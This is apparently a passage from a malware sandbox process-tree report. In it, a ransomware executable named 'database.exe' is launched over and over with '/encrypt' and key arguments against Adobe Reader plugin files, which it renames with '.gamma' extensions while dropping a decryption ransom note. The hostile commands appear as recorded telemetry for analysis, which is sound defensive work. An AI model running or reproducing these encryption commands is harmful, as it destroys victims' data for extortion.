                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:4648
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:5056
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:1664
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:4624
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:6052
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:2388
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search5.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:3188
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:4780
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:6636
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:6644
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:6652
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#Decrypt_Files_ReadMe#.rtf"
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                        PID:6752
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\z1Tl1TIF-nyCXSXq7.[[email protected]]"
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:6828
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Flash.mpp.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:6180
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:6188
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:6200
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Real.mpp.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:6208
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:6216
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                      PID:1944
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.SYX.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:5640
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:5900
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
